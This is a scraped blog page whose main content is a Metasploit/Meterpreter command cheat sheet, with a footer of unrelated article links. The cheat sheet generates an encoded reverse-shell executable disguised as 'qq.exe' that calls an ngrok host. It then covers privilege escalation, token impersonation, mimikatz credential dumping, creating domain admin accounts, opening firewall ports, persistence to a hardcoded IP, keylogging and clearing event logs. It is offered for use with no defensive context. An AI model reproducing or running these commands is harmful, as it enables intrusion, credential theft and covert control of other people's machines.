meterpreter Command Sample

==================================================================================================

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i  -b '\x00' LHOST=free.ngrok.cc LPORT= -f c

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i  -b '\x00' LHOST=free.ngrok.cc LPORT= -f exe -o qq.exe

upx - qq.exe -k

==================================================================================================

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.195.45

set lport

set ExitOnSession false

set AutorunScript post/windows/manage/smart_migrate

exploit -j -z

jobs

sessions -i

sysinfo

screenshot

getuid

getsystem

getuid

run post/windows/manage/priv_migrate

background

ps

steal_token PID

drop_token

getuid

use incognito

help incognito

list_tokens -u

list_tokens -g

impersonate_token DOMAIN_NAME\USERNAME

add_user domainuser password -h 192.168.195.191

add_group_user "Domain Admins" domainuser -h 192.168.195.191

run post/windows/gather/smart_hashdump

# http://www.objectif-securite.ch/en/ophcrack.php

use mimikatz

help mimikatz

msv

ssp

kerberos

wdigest

mimikatz_command -f samdump::hashes

mimikatz_command -f sekurlsa::searchPasswords

run post/windows/gather/checkvm

run post/windows/gather/enum_applications

run post/windows/gather/dumplinks

run post/windows/gather/usb_history

run post/windows/gather/enum_devices

execute -f cmd.exe -i -H -t

net user username userpass /add

net localgroup "Administrators" username /add

net user domainuser userpass /add /DOMAIN

net group "Domain Admins" domainuser /add /DOMAIN

netsh firewall add portopening TCP  "Notepad" ENABLE ALL

netsh firewall add portopening TCP  "Notepad" ENABLE ALL

exit

run metsvc

run persistence -X -i  -p  -r 47.90.92.56

run post/windows/manage/enable_rdp

run getgui -e

run getgui -u username -p userpass

# rdesktop -u username -p userpass server[:port]

clearev

run post/windows/capture/keylog_recorder

==================================================================================================

meterpreter Command Sample的更多相关文章

  1. POJ-1028 Web Navigation 和TOJ 1196. Web Navigation

    Standard web browsers contain features to move backward and forward among the pages recently visited ...

  2. 北大poj- 1028

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 33281   Accepted: 14836 ...

  3. POJ 1028题目描述

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  4. hdu 1509 Windows Message Queue

    题目连接 http://acm.hdu.edu.cn/showproblem.php?pid=1509 Windows Message Queue Description Message queue ...

  5. 小学生玩ACM----优先队列

    思来想去,本人还是觉得,这个优先队列啊,不学不行,怎么说咧?虽说有时候我可以模仿它的功能,但是有的题目会坑的我大放血,况且多学会用一个小东东总不会伤身的撒,何况我是永举不垂的,哦耶,嘿嘿 优先队列嘛就 ...

  6. Web Navigation

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  7. hdoj 1509 Windows Message Queue【优先队列】

    Windows Message Queue Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Ot ...

  8. SOSEx ReadMe

    Quick Ref:--------------------------------------------------bhi [filename] BuildHeapIndex - Builds a ...

  9. POJ-1028(字符串模拟)

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 31906   Accepted: 14242 ...

随机推荐

  1. Linux系统Docker启动问题Job for docker.service failed because the control process exited with error code. See "systemctl status docker.service"

    在Liunx中使用Docker, 注: Liunx使用的是在虚拟机下的centOS7版本在刚开始安装Docker时没有任何错误, 但是在后续的docker启动过程中, 出现以下问题: [root@zk ...

  2. UNIX网络编程总结四

    socket: 为了执行网络I/O,一个进程做的第一件事就是调用socket函数. family指明协议族,type指明类型,除非在原始套接口,protocol一般为0,并非所有的family,typ ...

  3. [Poj2349]Arctic Network(二分,最小生成树)

    [Poj2349]Arctic Network Description 国防部(DND)要用无线网络连接北部几个哨所.两种不同的通信技术被用于建立网络:每一个哨所有一个无线电收发器,一些哨所将有一个卫 ...

  4. uboot中Kconfig架构的理解

    1./u-boot-2019.07/Kconfig 是顶层Kconfig mainmenu "U-Boot $UBOOTVERSION Configuration"  #这是总me ...

  5. 2018-10-01-weekly

    Algorithm 77. 组合 What 给定两个整数 n 和 k,返回 1 ... n 中所有可能的 k 个数的组合. How 利用递归的思想,当凑够k个数时,就回退回去,remove掉一个数,在 ...

  6. BZOJ 1233 干草堆 (单调队列优化DP)

    $ BZOJ~1233~~ $ 干草堆: (题目特殊性质) $ solution: $ 很妙的一道题目,开始看了一眼觉得是个傻逼贪心,从后往前当前层能多短就多短,尽量节省花费.但是这是DP专题,怎么会 ...

  7. php io

    1.获取目录下文件,不包括子目录 //获取某目录下所有文件.目录名(不包括子目录下文件.目录名) $handler = opendir($dir); while (($filename = readd ...

  8. Vue 组件间的传值(通讯)

    组件之间的通讯分为三种 父给子传 子给父传 兄弟组件之间的通讯 1 父组件给子组件传值 子组件嵌套在父组件内部,父组件给子组件传递一个标识,在子组件内部用props接收,子组件在模板里可以通过{{}} ...

  9. Sentinel 1.7.0 发布,支持 Envoy 集群流量控制

    流控降级中间件Sentinel 1.7.0版本正式发布,引入了 Envoy 集群流量控制支持.properties 文件配置.Consul/Etcd/Spring Cloud Config 动态数据源 ...

  10. php array_splice()函数 语法

    php array_splice()函数 语法 作用:从数组中移除选定的元素,并用新元素取代它.dd马达价格 语法:array_splice(array,start,length,array) 参数: ...